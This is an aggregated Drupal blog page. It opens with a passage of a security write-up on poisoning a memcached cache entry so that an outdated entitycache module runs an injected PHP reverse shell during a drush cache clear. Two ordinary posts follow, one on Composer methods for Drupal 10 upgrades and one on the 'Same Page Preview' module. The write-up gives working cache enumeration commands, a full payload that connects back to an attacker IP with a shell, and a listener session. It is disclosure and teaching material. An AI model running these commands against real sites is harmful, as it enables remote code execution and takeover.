First we're going to assume that the attacker has network access to the memcached daemon. Hopefully this is quite unlikely in real life, but it's not impossible.

The objective of the attack will be exactly the same in that we want to inject a malicious payload into the array keys of the data cached for entity info.

The mechanics of how we might do so are a little different with a "memcache injection" though.

The Drupal memcache module (optionally) uses a key prefix to "namespace" cache items for a given site, which allows multiple applications to share the same memcached instance (and such a shared instance is one scenario in which this attack might take place).

In order to be able to inject a payload into a specific cache item, the attacker would need to find out what prefix is in use for the target site.

Here's an example of issuing a couple of commands over the network to a memcached instance in order to find out what the cache keys look like:

$ echo "stats slabs" | nc memcached 11211 | head -n2
STAT 2:chunk_size 120
STAT 2:chunks_per_page 8738
 
$ echo "stats cachedump 2 2" | nc memcached 11211 | head -n2
ITEM dd_d7-cache-.wildcard-node_types%3A [1 b; 0 s]
ITEM dd_d7-cache-.wildcard-entity_info%3A [1 b; 0 s]

This shows us that there's a Drupal site using a key prefix of dd_d7. A large site may be using multiple memcached slabs and this enumeration step may be a bit more complex.

So in this case the cache item we're looking to attack will have the key dd_d7-cache-entity_info%3Aen.

We can go through a very similar exercise to what we did with the SQL caches; using a test site to inject the minimal data structure we want into the cache, then extracting it to see exactly what it looks like when stored in a memcache key/value pair.

There are a couple of small complications we're likely to encounter with this workflow.

One of those is that Drupal typically uses compression by default in memcache. This is generally a good thing, but makes it harder to extract the payload we want to inject in plain text that's easy to manipulate.

If you've ever output a zip file or compressed web page in your terminal and ended up with a screen full of gobbledygook, that's the sort of thing that'll happen if you try to retrieve a compressed item directly from memcached.

We can get around this by disabling compression on our test site.

Another potential problem is that the memcache integration works a bit differently to database cache when it comes to expiry of items. By default, memcache won't return items once their expiry timestamp has passed, whereas the database cache will return stale items (for a while at least).

This means that if an attacker prepares a payload for memcache but leaves the expiry timestamp in tact, it's possible that the item will already be expired by the time the payload is injected into the target site, and the attack will not work.

It's not too hard to get around this by setting a fake timestamp that should avoid expiry. Note that there are at least two different types of expiry at play here; memcache itself has an expiry time, and Drupal's cache API has its own on top of this.

There's also the concept of cache flushes in Drupal memcache. It's out of scope to go into too much detail about that here, but the tl;dr is that the memcache module keeps track of when caches are flushed and tries not to return items that were stored before any such flush. An attack has more chance of succeeding if it also tries to ensure that the injected cache item doesn't fall foul of this as it'd then be treated as outdated and not returned.

Injecting an item into memcache will typically mean using the SET command.

The syntax for this command includes a flags parameter which is "opaque to the server" but is used by the PHP memcached extension to determine whether a cache item is compressed. This means that even if a site is using compression by default, an attacker can inject an uncompressed item and the application will not know the difference; the PHP integration handles the compression (or lack thereof).

Part of the syntax also tells the server how many bytes of data are about to be transmitted following the initial SET instruction. This means that if we manipulate the data we want to store in memcache, we have to ensure that the byte count remains correct.

We also need to ensure that the PHP serialized data remains consistent; for example if we change an IP address we need to ensure that the string it's within still has the correct length e.g. s:80:\"foo' ...

Putting all of that together, and jumping through some more hoops to ensure that quotes are appropriately escaped, we might end up with something like the below:

$ echo -e -n "set dd_d7-cache-entity_info%3Aen 4 0 978\r\nO:8:\"stdClass\":6:{s:3:\"cid\";s:14:\"entity_info:en\";s:4:\"data\";a:3:{s:4:\"user\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:4:\"file\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:80:\"foo', TRUE);}\$s=fsockopen(\"172.19.0.1\",1337);\$p=proc_open(\"sh\",[\$s,\$s,\$s],\$i);//\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}}s:7:\"created\";i:TIMESTAMP;s:17:\"created_microtime\";d:TIMESTAMP.2850001;s:6:\"expire\";i:0;s:7:\"flushes\";i:999;}\r\n" | sed "s/TIMESTAMP/9999999999/g" | nc memcached 11211

This should successfully inject a PHP reverse shell into the array keys, which gets executed when drush cc all is run and the vulnerable code passes each array key to create_function().

$ ./poison_entity_info.sh  # this script contains the memcache set command above
STORED
 
$ drush ev 'print_r(array_keys(entity_get_info()));'
  Array
  (
      [0] => user
      [1] => file
      [2] => foo', TRUE);}$s=fsockopen("172.19.0.1",1337);$p=proc_open("sh",[$s,$s,$s],$i);//
  )
 
$ drush cc all
'all' cache was cleared.

Meanwhile in the attacker's terminal...

$ nc -nvlp 1337
Listening on 0.0.0.0 1337
 
Connection received on 172.19.0.3 58220
 
python -c 'import pty; pty.spawn("/bin/bash")'
 
mcdruid @ drupal-7:/var/www/html$ head -n2 CHANGELOG.txt
Drupal 7.xx, xxxx-xx-xx (development version)
-----------------------

We successfully popped an interactive reverse shell from the victim system when the drush cache clear command was run.

One final step in this attack might be to deliberately break the site just enough that the administrator will manually clear the caches to try to rectify the problem, but not so badly that clearing the caches with drush will not work.

Perhaps the injection into the entity_info cache item already achieves that goal?

Could this attack also be carried out via Redis? Probably.

I'm sharing the details of this attack scenario because I think it's an interesting one, and because well maintained sites should not be affected. In order to be exploitable the victim site has to be running an outdated version of the entitycache module, on PHP<8, and most importantly has to be vulnerable (or at least exposed) in quite a serious way; if an attacker can inject arbitrary data into a site's caches, they can do all sorts of bad things.

As always, the best advice for anyone concerned about their site(s) being vulnerable is to keep everything up-to-date; the latest releases of the entitycache module no longer call create_function().

Thanks to Greg Knaddison (greggles) for reviewing this post.

Nov 27 2023
Nov 27
Allan ChappellAllan Chappell

Allan Chappell

Senior Support Lead

Allan brings technological know-how and grounds it with some simple country living. His interests include DevOps, animal husbandry (raising rabbits and chickens), hiking, and automated testing.

November 27, 2023

At the time of this blog, we have done two major version upgrades of Drupal and have refined the process along the way. There has been a lot of work in the community, through the efforts of people like Matt Glaman to make this process easier.

As a Support Engineer, I see a lot of approaches for achieving the same results in many areas of my work. Here, I’d like to share with you three different ways to achieve an upgrade of a module or theme that isn’t ready for the next major Drupal version, each with pros and cons, but all absolutely acceptable.

Why do we have this problem?

All new Drupal developers have a hard time with the layers of code changes that happen in the Drupal community. We have custom package types, custom install locations, patches, and scaffolding. To make the challenges worse, we have two ways to identify a module’s dependencies — that being a .info.yml file and for some, a composer.json. This is because some Drupal modules may want to build upon an existing PHP library or project, in addition to other Drupal modules. To ease the pain of having to define some dependencies twice, both in the .info.yml file and composer.json file, Drupal.org built their packagist, a repository of Composer packages, to read the .info.yml files from the root of the project and create Composer version constraints from that. For example, if the .info file contained the following:

name: My Module
type: module
core_version_requirement: ^8.8 || ^9
dependencies:
  - ctools:ctools

Then Drupal.org’s packagist would create the following for the release that contained that .info.yml file, saving the contributed developer a lot of trouble.

{
    "type": "drupal-module",
    "name": "drupal/my_module",
    "require": {
      "drupal/core": "^8.8 || ^9",
      "drupal/ctools": "*"
    }
  }

I hit on something there, though. It will create that for the release the .info.yml was in. When most code changes come in the form of patches, this poses a challenge. You apply your patch to the .info.yml after you download the release from Drupal.org’s packagist. Additionally, Drupal.org doesn’t create a new release entry for every patch file in the issue queue. So you are left with the question, “How do I install a module on Drupal 10 that requires Drupal 9 so that I can patch it to make it compatible for Drupal 10?”

Drupal Lenient

One of the easiest methods for those who don’t understand the ins and outs of Composer is to use the Drupal Lenient plugin. It takes a lot of the manual work out of defining new packages and works with any drupal-* typed library. Types are introduced to us through the use of the Composer Installer plugin and manipulated further with something like Composer Installers Extender. Composer plugins can be quite powerful, but they ultimately add a layer of complexity to any project over using core composer tactics.

Drupal Lenient works by taking any defined package pulled in by any means via Composer, and replaces the version constraints for drupal/core currently, at the time of this writing, with “^8 || ^9 || ^10“. So where the requirements might look like the example earlier “drupal/core“: “^8.8 || ^9“, they are replaced, making it now possible to install alongside Drupal 10, even though it might not‌ be compatible yet. This allows you to patch, test, or use the module as is, much like if you would have downloaded the zip and thrown it into your custom modules directory.

An example may look like this:

{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8"
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/my_module": "1.x-dev",
    "cweagans/composer-patches": "^1.7.3",
    "mglaman/composer-drupal-lenient": "^1.0.3"
  }"
  extra": {
    "composer-exit-on-patch-failure": true,
    "drupal-lenient": {
      "allowed-list": [
        "drupal/my_module"
      ]
    },
    "patches": {
      "drupal/my_module": {
        "3289029: Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2022-06-16/my_module.1.x-dev.rector.patch"
      }
    },
    "patchLevel": {
      "drupal/core": "-p2"
    },
  }
}

Note the Drupal-Lenient allow list. Also note that you will need to make sure and install the plugin before trying to install the module that doesn’t support Drupal 10 in this case. If you want an excellent step-by-step, Matt put one together in the Readme.

The pros:

  • Easy-peasy to install
  • Feeds off the original packagist packages, so if there is an upgrade, you don’t have to do anything special to transition

The cons:

  • Lenient has the control and may cause inexplicable errors when updating due to unsupported core versions
  • PHP devs not familiar with Drupal Lenient won’t know to look for it
  • Flaky experiences when switching in and out of branches that include this plugin. If you context switch a lot, be prepared to handle some errors due to Composer’s challenges maintaining state between branches.
  • Patches to other dependencies inside composer.json still require you to run through some hoops

Custom package

If you want more control over what the module can and cannot do, while keeping the core of Composer functionality without adding yet another plugin, check out this method. What we will do here is find out what version the patch or merge request is being applied against. It should be stated in the issue queue and by best practices is a dev version.

If you are a perfectionist, you can use composer install -vvv to find the url or cache file that the module came from for packages.drupal.org. It is usually one of https://packages.drupal.org/files/packages/8/p2/drupal/my_module.json or https://packages.drupal.org/files/packages/8/p2/drupal/my_module~dev.json. You will note that the Composer cache system follows a very similar structure, swapping out certain characters with dashes.

With this information, you can grab the exact package as it’s defined in the Drupal packagist. Find the version you want, and then get it into your project’s composer.json.

Let’s use Context Active Trail as an example, because at the time of this writing, there is no Drupal 10 release available.

Drupal release information

Looking through the issue queue, we see Automated Drupal 10 compatibility fixes, which has a patch on it at. I grab the Composer package info and paste the 2.0-dev info into my composer.json under the “repositories” section as a type “package.”

Drupal packagesDrupal packages

Which should make your project look something like this:

{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "package",
      "package": {
        "keywords": [
          "Drupal",
          "Context",
          "Active trail",
          "Breadcrumbs"
        ],
        "homepage": "https://www.drupal.org/project/context_active_trail",
        "version": "dev-2.x",
        "version_normalized": "dev-2.x",
        "license": "GPL-2.0+",
        "authors": [
          {
            "name": "Jigar Mehta (jigarius)",
            "homepage": "https://jigarius.com/",
            "role": "Maintainer"
          },
          {
            "name": "jigarius",
            "homepage": "https://www.drupal.org/user/2492730"
          },
          {
            "name": "vasi",
            "homepage": "https://www.drupal.org/user/390545"
          }
        ],
        "support": {
          "source": "https://git.drupalcode.org/project/context_active_trail",
          "issues": "https://www.drupal.org/project/issues/context_active_trail"
        },
        "source": {
          "type": "git",
          "url": "https://git.drupalcode.org/project/context_active_trail.git",
          "reference": "8dc46a4cf28e0569b187e88627a30161ee93384e"
        },
        "type": "drupal-module",
        "uid": "context_active_trail-3192784",
        "name": "drupal/context_active_trail",
        "extra": {
          "branch-alias": {
            "dev-2.x": "2.x-dev"
          },
          "drupal": {
            "version": "8.x-2.0-rc2+1-dev",
            "datestamp": "1630867980",
            "security-coverage": {
              "status": "not-covered",
              "message": "Project has not opted into security advisory coverage!"
            }
          }
        },
        "description": "Set the active trail based on context.",
        "require": {
          "drupal/context": "^4.1",
          "drupal/core": "^8.8 || ^9"
        }
      }
    },
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8"
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/context_active_trail": "2.x-dev",
    "cweagans/composer-patches": "^1.7.3",
    "mglaman/composer-drupal-lenient": "^1.0.3"
  }"
  extra": {
    "composer-exit-on-patch-failure": true,
    },
    "patches": {
    },
    "patchLevel": {
      "drupal/core": "-p2"
    },
  }
}

Now let’s change our version criteria:

…
        "description": "Set the active trail based on context.",
        "require": {
          "drupal/context": "^4.1",
          "drupal/core": "^8.8 || ^9 || ^10"
        }
…

And then add our patch:

…
  extra": {
    "composer-exit-on-patch-failure": true,
    },
    "patches": {
      "drupal/context_active_trail": {
        "Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2023-09-29/context_d10comp_3286756.patch"
      }
    },
    "patchLevel": {
      "drupal/core": "-p2"
    },
  }
…

Here, you will need to look to see if the patch is patching composer.json. If it is, you will need to modify your package information accordingly. For example, in this one, the fixer changes drupal/context from ^4.1 to ^5.0.0-rc1. That change looks like this:

…
        "description": "Set the active trail based on context.",
        "require": {
          "drupal/context": "^5.0.0-rc1",
          "drupal/core": "^8.8 || ^9 || ^10"
        }
…

Lastly, sometimes you run into some complications with the order packages are picked up by Composer. You may need to add an exclude element to the Drupal packagist.

…
  {
      "type": "composer",
      "url": "https://packages.drupal.org/8",
      "exclude": [
          "drupal/context_active_trail"
      ]
  },
…

Our final composer.json for our project could look something like this with all the edits:

{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "package",
      "package": {
        "keywords": [
          "Drupal",
          "Context",
          "Active trail",
          "Breadcrumbs"
        ],
        "homepage": "https://www.drupal.org/project/context_active_trail",
        "version": "dev-2.x",
        "version_normalized": "dev-2.x",
        "license": "GPL-2.0+",
        "authors": [
          {
            "name": "Jigar Mehta (jigarius)",
            "homepage": "https://jigarius.com/",
            "role": "Maintainer"
          },
          {
            "name": "jigarius",
            "homepage": "https://www.drupal.org/user/2492730"
          },
          {
            "name": "vasi",
            "homepage": "https://www.drupal.org/user/390545"
          }
        ],
        "support": {
          "source": "https://git.drupalcode.org/project/context_active_trail",
          "issues": "https://www.drupal.org/project/issues/context_active_trail"
        },
        "source": {
          "type": "git",
          "url": "https://git.drupalcode.org/project/context_active_trail.git",
          "reference": "8dc46a4cf28e0569b187e88627a30161ee93384e"
        },
        "type": "drupal-module",
        "uid": "context_active_trail-3192784",
        "name": "drupal/context_active_trail",
        "extra": {
          "branch-alias": {
            "dev-2.x": "2.x-dev"
          },
          "drupal": {
            "version": "8.x-2.0-rc2+1-dev",
            "datestamp": "1630867980",
            "security-coverage": {
              "status": "not-covered",
              "message": "Project has not opted into security advisory coverage!"
            }
          }
        },
        "description": "Set the active trail based on context.",
        "require": {
          "drupal/context": "^5.0.0-rc1",
          "drupal/core": "^8.8 || ^9 || ^10"
        }
      }
    },
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8",
      "exclude": [
          "drupal/context_active_trail"
      ]
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/context_active_trail": "2.x-dev",
    "cweagans/composer-patches": "^1.7.3",
    "mglaman/composer-drupal-lenient": "^1.0.3"
  }"
  extra": {
    "composer-exit-on-patch-failure": true,
    },
    "patches": {
      "drupal/context_active_trail": {
        "Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2023-09-29/context_d10comp_3286756.patch"
      }
    },
    "patchLevel": {
      "drupal/core": "-p2"
    },
  }
}

The pros:

  • Uses more core Composer functionality
  • A PHP developer will better understand ‌what’s going on here
  • You are in complete control of how this module package and version are defined
  • All the work is in one file

The cons:

  • Requires some understanding of how composer.json, packagists, and the magic of Drupal’s packagist all work
  • That’s a messy composer.json for the project
  • If you have to use exclude, you have to leave it up to outside forces to let you know when that module does finally put out and actual D10-ready version, and then undo all of this work

Standard PHP composer best practice says that if you make modifications to a package, fork it, maintain your modifications, and provide a pull request if it’s functionality you wish to contribute back. You can use this same approach with Drupal modules as well. Some may even say that’s what issue forks are for! That said, issue forks come with the downside that sometimes they go away, or are overridden with changes you don’t want. They are a moving dot.

For the sake of this example, let’s assume that we have forked the module on GitHub to https://github.com/fourkitchens/context_active_trail.git. If you don’t know how to make a fork, simply do the following:

  • Clone the module to your local computer using the git instructions for the module in question
  • Check out the branch you want to base your changes on
  • Create a new repository on GitHub
  • Add it as a remote git remote add github [email protected]:fourkitchens/context_active_trail.git
  • Push it! git push github 8.x-2.x

You can do this with a version of the module that is in a merge request in Drupal.org’s issue queue, too. That way you won’t have to reapply all the changes. However, if your changes are in a patch file, consider adding them to the module at this time using your favorite patching method. Push all your changes to the github remote.

If the patch files don’t have changes to composer.json, or if the module doesn’t have one, you will likely want to provide at least a bare-bones one that contains something like the following and commit it:

{
  "name": "drupal/context_active_trail",
  "type": "drupal-module",
  "require": {
    "drupal/context": "^5.0.0-rc1",
    "drupal/core": "^8.8 || ^9 || ^10"
  }
}

This will tell Composer what it needs to know inside the project about dependencies. This project already had a composer.json, so I needed to add the changes from the patch to it.

Inside our Drupal project we are working on, we need to add a new entry to the repositories section. It will look something like this:

    {
      "type": "vcs",
      "url": "https://github.com/fourkitchens/context_active_trail.git"
    },

The VCS type repository entry tells Composer to look at the repository and poll for all its branches and tags. These will be your new version numbers.

Much like in the “Custom Package” example, you may need to add an exclude property to the Drupal packagist entry.

…
  {
      "type": "composer",
      "url": "https://packages.drupal.org/8",
      "exclude": [
          "drupal/context_active_trail"
      ]
  },
…

Now, since Drupal packagist isn’t here to give Composer some version aliases, we have to use the old notation dev-BRANCHNAME for our version. Our require entry will look something like this:

 "drupal/context_active_trail": "dev-8.x-2.x",

Since we already added our patches as a commit to the module, this is all you need. Your final composer.json for your project would look like this:

{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "vcs",
      "url": "https://github.com/fourkitchens/context_active_trail.git"
    },
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8",
      "exclude": [
          "drupal/context_active_trail"
      ]
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/context_active_trail": "dev-8.x-2.x",
  }
}

It makes for a much cleaner project json, but now you’ve split the work into two locations, requiring some synchronization. However, if multiple sites of yours use this same module and need the same fixes, this absolutely has the least resistance and ability to get those changes out more quickly.

The pros:

  • Reusability
  • Two smaller, simpler chunks of work
  • Any PHP developer should be able to debug this setup as it uses Composer best practices. This method will be used in any project with any framework in the PHP ecosystem.

The cons:

  • Changes are in two separate places
  • Which patches are applied isn’t obvious in the composer.json and require looking through the commit history on the forked repository
  • Requires maintenance and synchronization when upgrades happen

Final thoughts

As with almost everything out there, there are multiple ways to achieve the same goal. I hope this brings awareness, and helps provide the flexibility you need when upgrading Drupal to a new major version. Obviously, each solution has strengths, and you may need to mix it up to get the results you want.

Making the web a better place to teach, learn, and advocate starts here...

When you subscribe to our newsletter!

Nov 24 2023
Nov 24

As I embarked on a recent journey to enhance the usability of Drupal from the perspective of both site owners and editors, I stumbled upon what could be a game changer for content editors – the "Same Page Preview" module.

This module offers an innovative solution, providing a page preview seamlessly integrated into the editing process. Say goodbye to the hassle of toggling between the edit form and a separate preview window. With the "Same Page Preview" module, it's all about real-time content visualisation and efficiency.

cti Blog Banner

Key Features

Effortless Installation

Setting up the "Same Page Preview" module is a breeze, and it's a matter of a simple checkbox configuration against specific content types.

On-Page Canvas Preview

When adding or editing content, an on-page canvas preview elegantly unfolds. As you interact with the edit form fields, the preview updates in real time, offering an instant, dynamic view of your content.

Custom Display Options

Tailor your preview experience to your liking. Choose to open the display in a new window, view content in full-screen mode, or select your preferred display mode. The module is all about personalising your content editing workflow.

Custom Display Options

Why it matters 

Watch a Short Demo: https://youtu.be/Mh_plCpt1_A


The "Same Page Preview" module has recently received recognition on the Talking Drupal podcast, where its potential was discussed. Furthermore, there's an active issue in the Drupal core ideas project advocating for the inclusion of this module in the Drupal core.


In my opinion, integrating "Same Page Preview" into the Drupal core would be an invaluable asset. I've encountered numerous projects where the concept of in-page content previews has sparked considerable interest and discussion.


Join me in exploring the possibilities that this module brings to the Drupal community and in advocating for its inclusion in the Drupal core. Let's make content editing even more user-friendly and efficient.

Pages

About Drupal Sun

Drupal Sun is an Evolving Web project. It allows you to:

  • Do full-text search on all the articles in Drupal Planet (thanks to Apache Solr)
  • Facet based on tags, author, or feed
  • Flip through articles quickly (with j/k or arrow keys) to find what you're interested in
  • View the entire article text inline, or in the context of the site where it was created

See the blog post at Evolving Web

Evolving Web